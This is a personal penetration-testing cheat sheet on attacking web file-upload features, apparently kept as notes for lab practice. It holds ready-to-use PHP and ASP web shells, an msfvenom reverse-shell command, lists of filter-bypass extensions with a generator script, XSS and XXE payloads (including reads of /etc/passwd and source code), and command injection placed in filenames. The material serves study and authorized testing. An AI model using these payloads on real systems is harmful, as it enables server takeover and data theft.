These cheatsheets serve as my personal quick reference. Therefore, they’re less organized than the box walkthroughs, but I’ve shared them in case others find them useful.
Web Shells
https://github.com/Arrexel/phpbash
<?php system($_REQUEST['cmd']); ?>
.NET applications
<% eval request('cmd') %>
Reverse Shells
https://github.com/pentestmonkey/php-reverse-shell
Custom Reverse shells (msfvenom)
-p flag for language
msfvenom -p php/reverse_php LHOST=OUR_IP LPORT=OUR_PORT -f raw > reverse.php
Frontend Filtering
Check HTML for validation functions and remove or bypass using burpsuite (upload something that is allowed and intercept and change body for webshell or reverse shell).
Backend Filtering
Blacklist Bypass
Example of blacklist backend code:
$fileName = basename($_FILES["uploadFile"]["name"]);
$extension = pathinfo($fileName, PATHINFO_EXTENSION);
$blacklist = array('php', 'php7', 'phps');
if (in_array($extension, $blacklist)) {
echo "File type not allowed";
die();
}
NOTE: Linux is case sensitive --> can be bypassed by playing with capital letters. In Windows this will not work.
Fuzzing for allowed extensions using Burpuite Intruder:
Wordlists to use:
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Extension%20PHP/extensions.lst https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Extension%20ASP https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/web-extensions.txt
Note, don't forget to untick URL-encode (the . cannot be url encoded).
Whitelist Bypass
Vulnerable Regex:
$fileName = basename($_FILES["uploadFile"]["name"]);
if (!preg_match('^.*\.(jpg|jpeg|png|gif)', $fileName)) {
echo "Only images are allowed";
die();
}
This pattern checks whether the filename contains the "jpg", "jpeg", "png" or "gif" extension but it does not check whether it ends with it (the "$" character is not included at the end).
The following could work in these cases:
.jpeg.php .jpg.php .png.ph .php%00.gif .php\x00.gif .php%00.png .php\x00.png .php%00.jpg .php\x00.jpg
Reverse Double Extension
the /etc/apache2/mods-enabled/php7.4.conf for the Apache2 web server may include the following configuration:
<FilesMatch ".+\.ph(ar|p|tml)">
SetHandler application/x-httpd-php
</FilesMatch>
This determines the files that allow PHP code execution. The same mistake is made. it only checks for files that CONTAIN but NOT END WITH ".php", ".phar" or ".phtml". Therefore, the following works as these extension are in the name but not at the end (assuming that files that end on .php or similar are filtered):
shell.php.jpg (and similar)
Character Injection
Characters to try:
%20 %0a %00 %0d0a / .\ . … :
Custom script to generate a wordlist:
for char in '%20' '%0a' '%00' '%0d0a' '/' '.\\' '.' '…' ':'; do
for ext in '.php' '.phps'; do
echo "shell$char$ext.jpg" >> wordlist.txt
echo "shell$ext$char.jpg" >> wordlist.txt
echo "shell.jpg$char$ext" >> wordlist.txt
echo "shell.jpg$ext$char" >> wordlist.txt
done
done
Used for outdated backend or misconfigurations.
Type Filters
Example code to test Content-Type header:
$type = $_FILES['uploadFile']['type'];
if (!in_array($type, array('image/jpg', 'image/jpeg', 'image/png', 'image/gif'))) {
echo "Only images are allowed";
die();
}
Just change the content type header. Can also fuzz for allowed types In Burpsuite using the content-type wordlist from seclists.
MIME types
Magic bytes (first few bytes) indicate which file it is.
echo "this is a text file" > text.jpg file text.jpg text.jpg: ASCII text
The file command looks at these magic bytes to determine the file type. Even if it is a JPG extension the file command sees it as a .txt file
Changing it to GIF while keeping the JPG extension:
echo "GIF8" > text.jpg file text.jpg text.jpg: GIF image data
Example of server codes that checks the MIME-type:
$type = mime_content_type($_FILES['uploadFile']['tmp_name']);
if (!in_array($type, array('image/jpg', 'image/jpeg', 'image/png', 'image/gif'))) {
echo "Only images are allowed";
die();
}
Tip: start with file that gets uploaded, intercept in Bupsuite and start from there by fuzzing allowed extensions. Then check for allowed content-types and then start playing with reverse double extensions.
Limited file uploads
XSS
When you can upload HTML files, you can include JavaScript code in it that then gets executed when a victim visits the page.
When a web app shows image metadata after upload. Inject a XSS payload in the Metadata parameter (e.g. comment or artist parameters):
exiftool -Comment=' "><img src=1 onerror=alert(window.origin)>' HTB.jpg
Another possibility is to change the MIME-type tp text/html --> rendered as HTML --> XSS executed.
SVG images are made up of XML --> add XSS payload to XML:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg xmlns="http://www.w3.org/2000/svg" version="1.1" width="1" height="1">
<rect x="1" y="1" width="1" height="1" fill="green" stroke="black" />
<script type="text/javascript">alert(window.origin);</script>
</svg>
XXE
Leak sensitive data using SVG by insertion of malicious XML:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <svg>&xxe;</svg>
Get source code:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]> <svg>&xxe;</svg>
Note: can of course also be used when XML can be uploaded instead of SVG. PDF, Word, PPT also use XML and thus can be used if Web app is vulnerable. Or with exiftool in JPG, GIF, JPEG and PNG.
Other attacks
Injections In File name
file$(whoami).jpg file`whoami`.jpg file.jpg||whoami
This gets executed when the backend uses the filename in a system command (you escape the command and execute new command)
XSS:
<script>alert(window.origin);</script>
Can get executed to on victims machine if filename is displayed to them.
Disclose Upload Directory
XXE
Goal: try to get error messages which may disclose the upload directory:
Upload existing file Super long name file